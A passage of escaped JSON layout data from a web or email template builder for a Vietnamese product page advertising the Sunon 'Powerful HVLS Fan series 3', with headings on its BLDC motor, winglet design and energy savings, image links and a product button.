5px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Powerful HVLS Fan series 3\\\"}},{\\\"id\\\":\\\"W9O7eHhacZ\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681372971446-Powerful3-02.jpeg\\\",\\\"width\\\":1201,\\\"height\\\":501},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_22\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#fbfdff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"lGqBbquE8Y\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_6\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"i2EkltQNgE\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"nU6qoDYWmf\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Q77fKW3-Fy\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontWeight\\\":400,\\\"color\\\":\\\"#000000\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_18\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u0110\\u1ed8NG C\\u01a0 BLDC SI\\u00caU M\\u1eceNG<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_49\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"xOs-4K6gyq\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XKL6VxLiLG\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373075524-Powerful3-04.jpeg\\\",\\\"width\\\":346,\\\"height\\\":346},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_23\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_50\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_21\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"i_-17_TRdX\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"B2U4XjQKPC\\\",\\\"contents\\\":[{\\\"id\\\":\\\"gQjpOE2lVs\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_19\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">THI\\u1ebeT K\\u1ebe WINGLET \\u0110\\u01af\\u1ee2C C\\u1ea4P B\\u1eb0NG S\\u00c1NG CH\\u1ebe<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_53\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"BxcRbO_qRk\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zJGYWIFIyO\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373089045-Powerful3-05.jpeg\\\",\\\"width\\\":346,\\\"height\\\":346},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_24\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_54\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_23\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"0zS-k-YaMk\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"2_QYVO-1IL\\\",\\\"contents\\\":[{\\\"id\\\":\\\"hJ3uimb6fl\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_20\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">M\\u1ede R\\u1ed8NG KHU V\\u1ef0C BAO PH\\u1ee6<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_51\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"wrh8StgZBP\\\",\\\"contents\\\":[{\\\"id\\\":\\\"EVHsNoTYti\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373107028-Powerful3-06.jpeg\\\",\\\"width\\\":346,\\\"height\\\":346},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_25\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_52\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_22\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"pv-4LZ79hK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"Neb6ugtoc-\\\",\\\"contents\\\":[{\\\"id\\\":\\\"4rYFrRChPv\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_5\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_27\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d\\\",\\\"contents\\\":[{\\\"id\\\":\\\"HzKOpZsTYF\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">KH\\u00d4NG CH\\u1ec8 L\\u00c0M M\\u00c1T-M\\u00c0 C\\u00d2N H\\u01a0N TH\\u1ebe N\\u1eeeA<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"MA9-sflre8\\\",\\\"cells\\\":[1,1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"iD1jJtASWA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"eq-xiXrcuq\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_21\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Gi\\u1ea3m nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 cung c\\u1ea5p s\\u1ef1 th\\u00f4ng gi\\u00f3<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_29\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"tv_Mh_NsJ-\\\",\\\"contents\\\":[{\\\"id\\\":\\\"cLJhNIARnf\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_22\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">T\\u0103ng hi\\u1ec7u su\\u1ea5t v\\u00e0 gi\\u1ea3m ch\\u1ea5n th\\u01b0\\u01a1ng lao \\u0111\\u1ed9ng<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_30\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"ovmg0A6Ji9\\\",\\\"contents\\\":[{\\\"id\\\":\\\"4LVHUXP5mE\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_23\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Ti\\u1ebft ki\\u1ec7m chi ph\\u00ed n\\u0103ng l\\u01b0\\u1ee3ng<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_31\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"u6LW96XO8s\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UealSRV4tL\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_24\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">B\\u1ea3o v\\u1ec7 thi\\u1ebft b\\u1ecb<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_32\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"4WAM7fzspr\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KbhLv2xvOj\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UJWGMVnLVA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373213640-Powerful3-07.jpeg\\\",\\\"width\\\":1201,\\\"height\\\":1069},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_26\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"kdDXPqyHnW\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/ceilingfan.vn\\/en\\/sunon-powerful-series-3\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 